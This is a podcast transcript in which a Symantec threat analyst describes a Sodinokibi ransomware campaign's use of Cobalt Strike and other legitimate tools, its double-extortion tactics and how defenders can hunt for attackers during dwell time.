CyberWire Daily - Leveraging legitimate tools. [Research Saturday]
Episode Date: September 12, 2020Researchers at Symantec spotted a Sodinokibi targeted ransomware campaign in which the attackers are also scanning the networks of some victims for credit card or point of sale (PoS) software. It is n...ot clear if the attackers are targeting this software for encryption or because they want to scrape this information as a way to make even more money from this attack. Joining us in this week's Research Saturday to discuss the report is Jon DiMaggio of Symantec. The research can be found here: Sodinokibi: Ransomware Attackers also Scanning for PoS Software, Leveraging Cobalt Strike Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K. data products platform comes in. With Domo, you can channel AI and data into innovative uses that
deliver measurable impact. Secure AI agents connect, prepare, and automate your data workflows,
helping you gain insights, receive alerts, and act with ease through guided apps tailored to
your role. Data is hard. Domo is easy. Learn more at ai.domo.com.
That's ai.domo.com.
Hello, everyone, and welcome to the CyberWire's Research Saturday.
I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down threats and vulnerabilities, solving some of the hard problems of protecting
ourselves in a rapidly evolving cyberspace. Thanks for joining us.
So we were actually not looking at ransomware. We were looking at a tool that's being misused
by a lot of bad guys these
days called Cobalt Strike. That's John DiMaggio. He's a senior threat intelligence analyst at
Symantec, a Broadcom company. The research we're discussing today is titled Sodinokibi,
ransomware attackers also scanning for POS software leveraging Cobalt Strike. And now, a message from our sponsor, Zscaler, the leader in cloud security.
Enterprises have spent billions of dollars on firewalls and VPNs,
yet breaches continue to rise by an 18% year-over-year increase in ransomware attacks and a $75 million record payout in 2024.
These traditional security tools expand your attack surface with public-facing IPs that are exploited by bad actors more easily than ever with AI tools.
It's time to rethink your security.
Zscaler Zero Trust Plus AI stops attackers
by hiding your attack surface,
making apps and IPs invisible,
eliminating lateral movement,
connecting users only to specific apps,
not the entire network,
continuously verifying every request
based on identity and context,
simplifying security management with AI-powered automation, and detecting threats using AI Thank you. So Cobalt Strike is a legitimate pen testing tool.
It's used essentially to test an organization's security posture so they can decide if they need to make changes to their defenses and how to best protect.
decide if they need to make changes to their defenses and how to best protect.
What we found was a lot of ransomware attackers, enterprise ransomware attackers specifically, were leveraging that and using it to get the initial foothold on organizations before they deploy ransomware.
So by looking at these sort of rogue deployments of this Cobalt Strike tool, what we found is, you know, when we started to look, we found, oh, this looks kind of interesting.
And we started to pull some threads and we started to see, okay, well, they're using this Cobalt Strike tool and, you know, now they're moving and they're using, you know, a lot of the legitimate tools within the network.
And, you know, they're dropping specific files, looking to turn off certain services.
network and, you know, they're dropping specific files, looking to turn off certain services. And long story short, it really built out a profile that was very familiar to us. At that point,
we believed it was one of the enterprise ransomware attack groups that we have been following or
tracking. And just sort of profiling and looking at those behaviors along with sort of the tools that they were using,
we were able to identify that this was a much larger scale attack.
It took a little bit, but once we eventually were able to find the payload, the ransomware payload,
and that really is the biggest differentiator between the handful of enterprise ransomware groups that are out there, they really do follow
almost the exact same steps when they're in networks. They're very, very similar these days.
Get in, use legitimate tools, go unnoticed, try to blend in with administrative traffic.
And it's not until they drop their payload that they give us something unique,
usually, to identify them. So we try to profile these groups. We try to build a digital
fingerprint of them per se based off of the tools, even legitimate ones that they use, the order that
they use them in, any behaviors that we see, as well as their malware. The thing about it is,
you know, these enterprise ransomware groups, you know, they're human beings behind the keyboard, and they all spend time in the environment
prior to actually engaging the ransom piece.
That's the last thing that they do.
There's a number of things, though, that were unique to this group that really made them
stand out from other groups.
But in essence, it's not until you see that ransom payload at the end that you can really
know who it is.
But there are some good giveaways that give you a clue that this is an enterprise ransomware attacker.
And obviously, that's the biggest concern to a lot of organizations these days is ransomware.
So it just set off a lot of alarms for us, and we started alerting customers, and we were able to prevent some of these attacks.
One of the big things that differentiates this group, however, there's sort of a minor
and a major point that are very different.
So a minor point, which is very interesting, was they were looking at point of sale devices
and software in organizations.
That's a little bit different than what we're used to seeing.
But the other thing that's really unique,
there's a couple of groups doing this, but not many.
And the Sotonokibi groups is one of them.
They're actually not just encrypting and holding your data.
If you don't pay, they're threatening to post that publicly
on sites like PaySpin and other publicly available infrastructure to embarrass the organization, to hurt their customers, to hurt their credibility in order to force them to pay.
So they don't really care how they get an organization to pay.
Maybe they don't hit the ransom that they want, but they're going to do what they can, whether it's taking advantage of your point of sale software, whether it's posting and or selling your data, and if you don't do any,
they're just going to embarrass you. So that makes them, in my mind, a little bit more dangerous.
It's sort of like ransomware, enterprise ransomware 2.0. We're seeing this change,
and there's a couple of groups doing it, but it wouldn't surprise me if we see that trend
increasing over the next year. Well, let's walk through some of the details together. Why don't we start with
Cobalt Strike? Can you give us a description of exactly what is that capable of doing and how do
they implement that to get what they're after here? Sure. So as I mentioned, it's a legitimate
tool. It's used for legitimate pen testing.
But what it does is it allows the – let's just go from the perspective of how the bad guy uses it.
It allows the bad guy to load shellcode onto machines.
Once they do that, they actually can load it into memory, and then they can compile, like old-school compile manually the shell code, and that's what they're doing.
They're using PowerShell, which is already in the environment
and comes on most Windows systems.
They're using that to download, to run PowerShell scripts
in memory of the victim system.
So it's not even, it's fileless.
It's not even on the system.
So it makes it much harder to detect is the reason I'm pointing that out.
And it downloads it, they compile it, and once they compile that code, now they actually have Cobalt Strike.
And that can be used for quite a number of purposes, everything from creating a reverse shell so that the attacker can now log in and access the network themselves, human on a keyboard access,
or it can be used to upload and download other binaries.
So they can download other malware if they want. And that's one of the main ways that we see where often they do obtain the ransomware payload.
They can download other tools.
However, I got to say, we usually, or with this group anyway,
the main thing that we see is they try to use the tools that are in the environment first.
And that's actually really smart on their behalf because it makes it harder to detect when they blend in with your legitimate traffic.
The one key to that, though, is if an organization has their security controls and their access sort of locked down and who has certain permissions
locked down, only administrators should have those tools. So in essence, you wouldn't have to look at
every machine or every user account on your infrastructure in order to monitor that, but you
would have to look at your administrators and see what they're doing because that's the tools these
guys are using. If they can't leverage those tools, then they download other things.
So we might see them download like Mimikatz, for example,
which is a tool that's also publicly available, free, and used by pen testers.
So they'll download that to obtain the credentials off of systems in the environment
to increase their privileges.
But one thing about that, what we used to see is bad guys would have their own custom
malware, and the advantage to that would be something we haven't seen.
They might have a better chance of getting past defenders or security software that catches
this stuff because it's something that's brand new and never been seen before.
However, what they've learned over time is the industry has gotten better at detecting those things just through the behavior of it, whether it's a new binary or not.
They've realized that they can use the legitimate tools. And when they can't, like an example I just
gave with Mimikatz, the benefit of that is even if we catch you, anyone can download and use it.
So it makes the attribution and using it for evidence and pointing a finger at someone much
harder because anyone in the world could download it and use it even though it's being used maliciously.
So it makes it hard for attribution and it benefits the adversary.
Now, one thing you noted here in your research is that the initial exploitation
usually comes through brute forcing, taking advantage of remote desktop protocol?
Yeah, so that's a big one.
Essentially, they scan get one that works.
Also, it depends. There's two ways that they use that.
Sometimes they'll use it on publicly facing infrastructure, so that means prior to having access, they'll do this.
And it's really bad when organizations have that open on their external infrastructure.
But with business needs today, sometimes shortcuts are taken or there's just a necessity where organizations are willing to take that risk.
Well, these bad guys are looking for that, and that's one of the things they exploit.
But one of the other ways that they use it, and this is also unique, is. They have another method.
Let's say they use spear phishing or let's say they find some other vulnerability on your public-facing infrastructure to get in.
Once they're in, they'll scan your internal network because a lot of organizations feel safe on the inside using that.
It makes administrating components easier, server administration, services, everything else.
And they feel safe because it's on their internal network. Well, once the bad guy has access, again, it's very easy to exploit,
and that's why they do that. So whether it's on the outside, which is worse, or the inside,
it still allows adversaries to use that as a mechanism to gain further foothold and increase their privileges and escalate their ability to
hurt the organization or to plant malware or ransomware or to steal your data or whatever
it might be. And these folks seem to be really targeting specific organizations. They're trying
to maximize the possibility for payback here? They are.
So one of the things that they do
is they really assess their victims.
And what I mean by that is
they want them to pay the ransom, obviously.
So they try to assess what is an amount
that we think this organization can pay
where it's not going to be unreasonable,
it's not going to hurt them financially, publicly,
but it's something that'll be easy enough for them to pay
and worth our time to do the attack
for the bad guy's value, the return on value.
Because like I said, they're spending time.
We're seeing anywhere from three to seven days
where they're on the network
prior to actually executing the ransom piece of this.
So by doing that, they're
there for a while, they're investing their time, and they look at like how many servers they have,
how many domain controllers they have, what types of servers are there, they file servers,
are they running services, are those services for their internal or for the external. So what I'm
getting at, and the reason I'm pointing that out is they literally do an
assessment of the victim. The more infrastructure, the more services, the more resources that they
have, as well as publicly available information on their profit margins, things like that,
all those sort of things they take into consideration when they, or it appears they
take that into consideration because
you'll see from one victim to the next, you know, there's differences in the ransom they ask,
and it really appears to be they're actually assessing and they want to give an amount that
you'll actually pay. Now, once they decide to pull the trigger and activate the ransomware, what happens next? So at that point, just being
direct here, you're in a lot of trouble at that point. The time to act is when they're on your
network for those three to seven days to stop it. Once that happens, at this point in time,
the encryption that they're using is not something we can defeat. We not just not,
I mean, my company, I mean, anyone, it's, it's, it's, it, you're not able to decrypt it without
that key. So if you don't get that key, you're never going to access that data again, you're
going to have to rebuild, hopefully you have offsite backups or whatever your backup plan is.
But you know, your actual systems that data is encrypted,
they actually go in and delete any local backups
or any backup servers that they can identify.
So you really need to have a complete separate network
with your backup data.
But they go in and delete that.
They make sure that you're going to be in trouble.
So once that encryption process takes place,
I mean, that's really all it is.
They're just encrypting data.
And I say just because we use that every day in the world for legitimate purposes.
They're just encrypting it, and they're using an encryption algorithm that, at this point in time, hasn't been broken so that they really have the ability to force you to pay or spend a lot more money having to rebuild your network infrastructure.
And like I mentioned, these guys take it a step further.
In addition to that, they're going to embarrass you publicly and try to hurt you and your public image
by posting you and or your customers' data.
They literally will try to pressure customers to call and be upset with the organization.
They'll actually post stuff on forums like, here's data, and they'll post a message.
Company X was warned, they refused to pay, and now your data is not secure.
Things of that nature.
So they really put a lot of effort to hurt you if you don't pay.
And that's why I said it's kind of ransomware 2.0.
It's scary how they're evolving the things that they're doing,
because it's one thing to
lose access to your data, but then it's another to have to deal with a public relations aspect,
especially if you're a publicly traded company. So it's definitely a scary world with these types
of attack groups. What sort of insights do you have on the exfiltration part of it. I'm curious. So one thing I wonder about is,
are they encrypting first
and then exfiltrating that encrypted data?
Or are they sending the data in the clear?
Do you have any insight into that?
Yeah, no, they're encrypting the data.
Now you got to remember, they have the key.
So it's very easy.
And by encrypting it,
when it's going out the door,
it blends in with other encrypted data and communications and protocols that a defender would naturally see.
So not only does it blend in, but it also isn't going to set off any alarms or whistles or anything like that because it's encrypted. So they've already owned the network. By the time – that's what I was saying. By the time the encryption takes place, they have gained – they now have legitimate accounts with legitimate administrative permissions.
And they're coming and going.
They've got remote access.
They're coming and going into your network.
And, yes, they're stealing that encrypted data.
They have it.
They unencrypt it on the back end.
They look through it.
They find what they consider the high-value data, and that's what they use to embarrass.
And they don't just post it all.
They threaten, hey, you're going to pay us.
If you don't, we're going to do X.
And then they'll give you a sample, and they'll post just a little bit, not enough to hurt you too much, but just enough to show that they're for real, that they're serious.
Not enough to hurt you too much, but just enough to show that they're for real, that they're serious.
And then if you still don't pay, then they do a lot more damage by releasing that information.
But yeah, they try to give the opportunity.
Their goal doesn't appear to be to embarrass.
It's not a revenge thing. I don't think they actually want to post the user's data.
They just want them to pay, period. They pay. They don't think they actually want to post the user's data. They just want them to pay, period.
They pay.
They don't post the data.
But if they refuse to pay, then yeah, then they go all in and try and hurt the organization as much as they can.
And what's their track record?
Do you know if people do pay, do they get their data back?
So this group is not – let me answer that from the aspect of,
so there's not a ton of enterprise ransomware attackers out there. There's a bazillion,
you know, elements of ransomware, but the actual organized enterprise ransomware attackers,
there's maybe a dozen of them. And that's really not a lot when you think about, you know,
from a global perspective. So when we, when most of these guys, when you pay, they know it's going to
be a very public event that you've been attacked and that you're being held ransom.
So most of the track record for most of the enterprise groups is they do actually provide
you the key after you pay.
And the reason they do that is again, this is their job.
It's almost a business. They are, they're not just regular criminals is, again, this is their job. It's almost a
business. They are, they're not just regular criminals. I mean, this is what they get up and
do every day. They're professionals, you know, that they're not run-of-the-mill criminals. They
just want the money. It's not personal. It's not revenge. They want the money. So what they want
to make sure that the next victim pays too. So yes, they the track record for enterprise attacks is to provide that key
if the victim pays. So what are your recommendations here? I mean, at what points along this attack
path do folks have an opportunity to stop it? So that's really, I think, the best kept secret about all this that I think really needs to be discussed
more. One of the things we're looking at right now as a project that I'm working is we're going
through all these enterprise ransomware attacks over the last year, and we're looking at what we
call dwell time, the time on network between initial access and when they
execute the ransom. And I can tell you that most of these groups, it's less than seven days.
This particular group was three to 10, but most of them, the average is less than seven. So it's
right around a week on your network. During that time, every day they increase their foothold. But
during that time, that is when you have the
opportunity to stop them. That is when you have the opportunity to detect, deter, and get them
off of your network and resources. The thing is, we as a culture in the industry, we're just very
reactive. So, you know, Defenders, it's just the mentality, and it's
slowly changing, but the mentality is to be reactive. And this requires a very proactive
hunting aspect to your defenses. And what I mean by that is you're not going to find them if you're
just looking for something to be flagged as malicious. You have to look at the legitimate tools,
administration tools,
and how they're being used on your network.
You know, we talk about,
this is going to be really basic,
but separation of privileges,
not allowing anybody to have all the keys to the kingdom.
If you really segregate the tools
that are in your environment
that are legitimate administrative tools
to only be on systems
and available to legitimate administrators, well, now you're talking maybe 10, 15% of your daily
activity that you have to monitor. So if you were to just do a random audit of that, let's say you
look at 10% of that activity every day, just doing that, you're going to dramatically increase your
chances of identifying things like
this. But that window of time when they're on your network, when they're using legitimate tools
and publicly available tools or any sort of pen testing tool that's being used, that is when you
need to prevent this. That's the window of opportunity. Once the execution of the ransomware
happens, to be honest with you, it's too late. You're really in the control of those attackers at that point.
So is my understanding correct here that rather than looking for a piece of malware, a piece of code,
because as you say, they're living off the land.
They're using tools that would normally be installed that wouldn't draw attention to themselves, that what you really need to be looking for are particular behaviors, particular activities that
might be out of the ordinary? Exactly. So things like they use a legitimate tool,
and this isn't just this group. I'm going to give you some examples that are common across
many of these dozen or so enterprise ransomware attackers.
One of the big things that they use, PowerShell and a tool called PSExec.
Both are used for administrative purposes.
PowerShell is extremely powerful, no pun intended.
And it allows them to run these scripts.
And they can even set schedules to run them to do different various tasks.
But what they do then with the PSExec tool is that's what they actually use to drop and to spread everything from ransomware to other tools and components.
They also use what's called bat files, which is just basically it's almost like a text file with a set of a stream of
commands that you run on the system. And they'll use this tool to deploy that. But things like that
you can flag like that's probably well, yes, that could be flagged as typical. But looking at that
and looking at these files, well, if you would actually just open that file up, these bat files in a text editor, you'd see that they were searching
and trying to identify security tools and firewalls or whatever it might be, things of that nature.
There's usually a list of all, and this is again common with all these groups, there'll be a list
of specific things that they're looking for that are shared that we sort of see used a lot. So
that's not really something your regular administrator is going to be doing. So watching this tool used to drop these files, just taking a look and seeing what they're
doing, again, just auditing the legitimate stuff. It sounds difficult, but that is the mindset that
we have to get if we're going to start catching these guys. It's not necessarily spending a
bazillion dollars on security tools and everything else. I'm not saying that you don't have to have
a strong security budget and security posture, but what I am saying is
even with that, that's not what's going to catch these guys. You have to have a human being
going and looking at the legitimate traffic. There's tools and software to help with that
as well, but you can't just wait for a red alarm to go off to say,
hey, there's malware on your network because that's not what they're using. You've got to look at the legitimate
activity as well.
I know, John, you and your team spend a lot of time looking at this sort of ransomware,
but also many of the other flavors and indeed different variants of malware.
I mean, is this the shape of things to come?
Should we expect to see more of this?
Is this the direction, to see more of this? Is this the direction
that this professionalization of this, is this where you sense things might be headed?
Yes and no. So it's definitely where we're headed, but it's not just the everyday criminal
that can pull this off. And what I mean by that is it takes several, it takes multiple people.
It takes a lot of coordination and it takes a lot of discipline to not make mistakes.
So it's, that's why I said that they're professionals, what they do at certain times,
the tools that they use, not using regular malware, spending the time on the network,
learning it, going undetected. It's sort of a discipline that these attackers use. And again, it's very
organized in the profiling, the figuring out who to ask for the ransom and who not to and how much
and figuring all those little details out. But that's the piece why I said that it's the way
we're going, but it's not as easy where you're going to see it blow up to where it's – everybody, every average criminal is going to do is because it is actually a difficult operation to execute, and it does take a lot of time and work.
If you're someone who has a regular day job, you're not going to have time to spend seven to ten days every day going into someone's network to try
to identify this activity. So this is all these guys do. They're professional. They know the tools.
They know the environment. It's not the first time they're using them when they go in. They're
well-rehearsed, and they really seem to know what they're doing. Now, one way, though, that you
could, unfortunately, we're not doing this, but one way that would really deter this is if everybody just stopped paying.
If they knew that it was less likely that an organization would pay, you wouldn't have all this happening.
You wouldn't have new groups popping up.
You wouldn't have them spending the time and resources to come up with new infrastructure and new creative ways to own an organization.
But most pay, unfortunately.
It's always recommended not to for that very reason, because if everybody stopped paying,
this just wouldn't be as lucrative and these guys would go find something new to do.
If you recall, there's other groups out there that have sort of evolved, like there's the
Evil Corps group sort of evolved. They used to be in the banking Trojan business,
and now they're an enterprise ransomware attacker.
So they transitioned.
They do what they can to get the money.
That's really what it's about is the money.
As I've mentioned that several times,
and I do that because with a lot of attackers,
it'll be personal.
They'll want to hurt an organization or whatever it is,
or they'll have some sort of a hacktivist reason where they have a cause and they want to cause embarrassment. That's not
what these guys are doing. It's all professional. It's all about the money.
Cyber threats are evolving every second, and staying ahead is more than just a challenge. Thank you. you total control, stopping unauthorized applications, securing sensitive data,
and ensuring your organization runs smoothly and securely. Visit ThreatLocker.com today
to see how a default-deny approach can keep your company safe and compliant.
Our thanks to Symantec's John DiMaggio for joining us. The research is titled Thank you. proudly produced in Maryland out of the startup studios of DataTribe, where they're co-building the next generation of cybersecurity teams and technologies.
Our amazing CyberWire team is Elliot Peltzman,
Puru Prakash,
Stefan Vaziri,
Kelsey Bond,
Tim Nodar,
Joe Kerrigan,
Carol Terrio,
Ben Yellen,
Nick Valecki,
Gina Johnson,
Bennett Moe,
Chris Russell,
John Petrick,
Jennifer Iben,
Rick Howard,
Peter Kilpie,
and I'm Dave Bittner.
Thanks for listening.